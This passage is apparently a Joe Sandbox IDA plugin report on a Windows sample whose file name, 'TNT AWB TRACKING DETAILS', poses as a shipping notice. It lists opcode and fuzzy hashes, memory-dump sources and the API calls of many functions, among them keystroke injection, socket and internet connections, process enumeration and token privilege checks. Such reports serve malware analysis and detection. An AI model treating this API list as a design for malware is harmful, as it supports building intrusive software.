                                                    • Opcode ID: d5baf9b8228d6ab3d455f25dc4c6f1c2c298bb86205b892c78f576b451106c30
                                                    • Instruction ID: b66f188960989ccd553e9409c7af240c207099527de2d53eaa1786c450c3ce70
                                                    • Opcode Fuzzy Hash: d5baf9b8228d6ab3d455f25dc4c6f1c2c298bb86205b892c78f576b451106c30
                                                    • Instruction Fuzzy Hash: C0514C34A04209EFCF14CF68C880AAE7BB5FF56360F548169FC659B2A0D771AD41EB90
                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F19AD2
                                                    • __itow.LIBCMT ref: 00F19B03
                                                      • Part of subcall function 00F19D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F19DBE
                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F19B6C
                                                    • __itow.LIBCMT ref: 00F19BC3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow
                                                    • String ID:
                                                    • API String ID: 3379773720-0
                                                    • Opcode ID: b50f4a8e35e14795027150428787c8c200e4fab8caaac1a1d664c66091d4b114
                                                    • Instruction ID: cd3b1abcdd8614a04f07b375b4f911c909f8c79028619422a40d07eef5f44d30
                                                    • Opcode Fuzzy Hash: b50f4a8e35e14795027150428787c8c200e4fab8caaac1a1d664c66091d4b114
                                                    • Instruction Fuzzy Hash: 3F41C270A08209ABDF11EF10D855FEE7BF9EF88720F000069F945A3291DBB19E85DB91
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00F369D1
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F369E1
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F36A45
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F36A51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                    • String ID:
                                                    • API String ID: 2214342067-0
                                                    • Opcode ID: c8b0bf5fc838f2a3587b98c231f545d4527dcdd8ace56eaf3a8521a7a8269fa9
                                                    • Instruction ID: 7f17fdd9ad325d07b0e5d3cce86723b1e062edae3fff007d8425178ba6aa8741
                                                    • Opcode Fuzzy Hash: c8b0bf5fc838f2a3587b98c231f545d4527dcdd8ace56eaf3a8521a7a8269fa9
                                                    • Instruction Fuzzy Hash: 9E41C235740200AFEB20AF24CE8AF2A77E8AB44B14F04C01CFA19AF3C3DA759D019791
                                                    APIs
                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00F4F910), ref: 00F364A7
                                                    • _strlen.LIBCMT ref: 00F364D9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID:
                                                    • API String ID: 4218353326-0
                                                    • Opcode ID: f1f42bcebeb015ebcb8e8d6529a852c50744c30336c67490d0ad54beb94e1dec
                                                    • Instruction ID: d41a9e2c49b75865f065d5a5b3c15f9e2fc21bef11bf5359fb5f1f2692d5592c
                                                    • Opcode Fuzzy Hash: f1f42bcebeb015ebcb8e8d6529a852c50744c30336c67490d0ad54beb94e1dec
                                                    • Instruction Fuzzy Hash: 1341C636900108BFCB14EBA4DD85FAEB7F9AF44320F148169F91AE7292DB30AD45D750
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F2B89E
                                                    • GetLastError.KERNEL32(?,00000000), ref: 00F2B8C4
                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F2B8E9
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F2B915
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: 244682a7e9f939d7b59b643cb8215faf4b45963a8034874fa0b2a0d7f7f76e86
                                                    • Instruction ID: a1a8bf074867b9359b16ca3a28e8892efada87cf32b9a68a89bd5e9c3ed01d3c
                                                    • Opcode Fuzzy Hash: 244682a7e9f939d7b59b643cb8215faf4b45963a8034874fa0b2a0d7f7f76e86
                                                    • Instruction Fuzzy Hash: B0411C3AA00514DFCB15DF15C544E59BBE1BF4A720F058098EC4AAB362CB35FD42DB91
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F488DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: af889a05f65c839be5b6007fbd977cb26a386c95b1b1e88d36ff1f1ddddff98d
                                                    • Instruction ID: abe846093122119ceb4794636786b1b1be0ce11ef27b84ffcca7658ca8eea1dc
                                                    • Opcode Fuzzy Hash: af889a05f65c839be5b6007fbd977cb26a386c95b1b1e88d36ff1f1ddddff98d
                                                    • Instruction Fuzzy Hash: D6310434A40508BFEF209B28CC45FBC3FA0EB067A0F544412FE15E62A1CE30D982B752
                                                    APIs
                                                    • ClientToScreen.USER32(?,?), ref: 00F4AB60
                                                    • GetWindowRect.USER32(?,?), ref: 00F4ABD6
                                                    • PtInRect.USER32(?,?,00F4C014), ref: 00F4ABE6
                                                    • MessageBeep.USER32(00000000), ref: 00F4AC57
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
                                                    • Opcode ID: a48fa0554349ed0d89d3dc1aea1b98156696e45624a78e71b9bec94b3bbdb178
                                                    • Instruction ID: 73df531c618adc8028d30d442f3816c02883d28ed87fe4ea780264d0cc809cf9
                                                    • Opcode Fuzzy Hash: a48fa0554349ed0d89d3dc1aea1b98156696e45624a78e71b9bec94b3bbdb178
                                                    • Instruction Fuzzy Hash: C5418835A402189FDB11CF58C8C4BA97BF5FB49710F1884A9EE189F364D730E841EB92
                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F20B27
                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F20B43
                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F20BA9
                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F20BFB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: 3644f87deb0dd10535aa49fea9cafaa65e29ac808cfe9ba9ca68cf994e45f2b6
                                                    • Instruction ID: 02c9106ec958f270ebffcdfa917d530ba74bcb07fdddbf7792db022413e109c0
                                                    • Opcode Fuzzy Hash: 3644f87deb0dd10535aa49fea9cafaa65e29ac808cfe9ba9ca68cf994e45f2b6
                                                    • Instruction Fuzzy Hash: EE314B72D4022CAEFF308B25AC05BFABBA5BB85334F08435AF895D11D2CB748985B755
                                                    APIs
                                                    • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00F20C66
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F20C82
                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F20CE1
                                                    • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00F20D33
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: 39f4bf523deb4fcffe84e493e6ce7ea4549d4917c32d3f85f08b7a0fe65e0b5f
                                                    • Instruction ID: 94665e99deafe1c6d884b373a55dc9a009abb45b33b19a79f527db9f758b7f56
                                                    • Opcode Fuzzy Hash: 39f4bf523deb4fcffe84e493e6ce7ea4549d4917c32d3f85f08b7a0fe65e0b5f
                                                    • Instruction Fuzzy Hash: DE316E72E802285EFF348B64AC047FEBB66AB45330F44431AE485511D2CB795D45B751
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EF61FB
                                                    • __isleadbyte_l.LIBCMT ref: 00EF6229
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EF6257
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EF628D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 404162062f5ea21d6975e202fc7ea31559ba3356cb048b91296a17b0c3630447
                                                    • Instruction ID: c2547e198bccd41a44e3d41a14b92f0587320e0f484b474d40c88d11cb81f587
                                                    • Opcode Fuzzy Hash: 404162062f5ea21d6975e202fc7ea31559ba3356cb048b91296a17b0c3630447
                                                    • Instruction Fuzzy Hash: 4831DE3060024EAFEF218F65CC44BBB7BB9FF42314F155068EA28A71A1E731E950DB90
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00F44F02
                                                      • Part of subcall function 00F23641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F2365B
                                                      • Part of subcall function 00F23641: GetCurrentThreadId.KERNEL32 ref: 00F23662
                                                      • Part of subcall function 00F23641: AttachThreadInput.USER32(00000000,?,00F25005), ref: 00F23669
                                                    • GetCaretPos.USER32(?), ref: 00F44F13
                                                    • ClientToScreen.USER32(00000000,?), ref: 00F44F4E
                                                    • GetForegroundWindow.USER32 ref: 00F44F54
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: c3fa53e8d7962e8cdd8b4bc34bf86cf05ec5a56a3d16ef4a68c04ed1daa002cf
                                                    • Instruction ID: 73622b198842e97c8755f24666a81a660ec8e27c32ffdc3c9d3ef1cae22d7316
                                                    • Opcode Fuzzy Hash: c3fa53e8d7962e8cdd8b4bc34bf86cf05ec5a56a3d16ef4a68c04ed1daa002cf
                                                    • Instruction Fuzzy Hash: B7312C72D00108AFDB04EFA5CD85EEFB7F9EF99300F10406AE815E7201DA75AE458BA0
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00F23C7A
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00F23C88
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00F23CA8
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F23D52
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 420147892-0
                                                    • Opcode ID: ec0db7c770d0600e977326d2f810467fb63e2b4d8a0a2aefd0797dcd28461159
                                                    • Instruction ID: 397ace4a77e6df27da22b17cfd70c21802f5f0b7206a7f0a11dc76b56706ae1f
                                                    • Opcode Fuzzy Hash: ec0db7c770d0600e977326d2f810467fb63e2b4d8a0a2aefd0797dcd28461159
                                                    • Instruction Fuzzy Hash: 4B31C2711083099FD300EF20D881FAFBBE8EFD9350F50082DF495961A1EB71AA4ADB52
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • GetCursorPos.USER32(?), ref: 00F4C4D2
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EFB9AB,?,?,?,?,?), ref: 00F4C4E7
                                                    • GetCursorPos.USER32(?), ref: 00F4C534
                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EFB9AB,?,?,?), ref: 00F4C56E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                    • String ID:
                                                    • API String ID: 2864067406-0
                                                    • Opcode ID: 257118e91e85f8e3506c5323ae3ae2bd795f2a5c16ce932cd1c7f40d4674a476
                                                    • Instruction ID: ca3511d03af1dd27375d599c6c7ec7a1e1865349b296ec0c2de2e8f1e3f1fa95
                                                    • Opcode Fuzzy Hash: 257118e91e85f8e3506c5323ae3ae2bd795f2a5c16ce932cd1c7f40d4674a476
                                                    • Instruction Fuzzy Hash: 7B318D39A01018AFDB65CF58C858EFE7FB5EB09760F484069FD099B261C731A950EBE4
                                                    APIs
                                                      • Part of subcall function 00F1810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F18121
                                                      • Part of subcall function 00F1810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F1812B
                                                      • Part of subcall function 00F1810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F1813A
                                                      • Part of subcall function 00F1810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F18141
                                                      • Part of subcall function 00F1810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F18157
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F186A3
                                                    • _memcmp.LIBCMT ref: 00F186C6
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F186FC
                                                    • HeapFree.KERNEL32(00000000), ref: 00F18703
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                    • String ID:
                                                    • API String ID: 1592001646-0
                                                    • Opcode ID: bd70324017f22d7ae364b2ca40a9d93e0135155198f7c0526dc254c79af6f572
                                                    • Instruction ID: 5ebcbe5089e06436e15dbadbbd51eef1e2d5f55d1d0c8ddeae7717d9fed4d385
                                                    • Opcode Fuzzy Hash: bd70324017f22d7ae364b2ca40a9d93e0135155198f7c0526dc254c79af6f572
                                                    • Instruction Fuzzy Hash: 6121B031E00108EFDB04DFA4CA58BEEB7F8EF41354F144059E844A7241DB31AE46EB50
                                                    APIs
                                                    • __setmode.LIBCMT ref: 00EE09AE
                                                      • Part of subcall function 00EC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F27896,?,?,00000000), ref: 00EC5A2C
                                                      • Part of subcall function 00EC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F27896,?,?,00000000,?,?), ref: 00EC5A50
                                                    • _fprintf.LIBCMT ref: 00EE09E5
                                                    • OutputDebugStringW.KERNEL32(?), ref: 00F15DBB
                                                      • Part of subcall function 00EE4AAA: _flsall.LIBCMT ref: 00EE4AC3
                                                    • __setmode.LIBCMT ref: 00EE0A1A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                    • String ID:
                                                    • API String ID: 521402451-0
                                                    • Opcode ID: 7b5f8a61c0492adc18967ccdfc137eefdca6ee26fe531554c32c6cb6c16d308d
                                                    • Instruction ID: ebc603b2f6a1922952ec5048f85f01ac1a97c793f66f3eab2fa0c1742183321c
                                                    • Opcode Fuzzy Hash: 7b5f8a61c0492adc18967ccdfc137eefdca6ee26fe531554c32c6cb6c16d308d
                                                    • Instruction Fuzzy Hash: AC116AB290428C6FCB04B7B6AC46DFE77E89F85320F101069F104772C3EE71598663A0
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F317A3
                                                      • Part of subcall function 00F3182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F3184C
                                                      • Part of subcall function 00F3182D: InternetCloseHandle.WININET(00000000), ref: 00F318E9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 1463438336-0
                                                    • Opcode ID: 66ecd8f62a3b4bed46884d4da4cd71b3e92821d6240904bd0def5591a4bf36fb
                                                    • Instruction ID: aedf0b56048099a74631835fc86cdf91cfc317739dcac4ab8264951c7fa85fe0
                                                    • Opcode Fuzzy Hash: 66ecd8f62a3b4bed46884d4da4cd71b3e92821d6240904bd0def5591a4bf36fb
                                                    • Instruction Fuzzy Hash: F421C036600605BFEB129F60DC01FBBBBA9FF49730F14402AFA1596650DB75D811BBA4
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,00F4FAC0), ref: 00F23A64
                                                    • GetLastError.KERNEL32 ref: 00F23A73
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F23A82
                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F4FAC0), ref: 00F23ADF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                    • String ID:
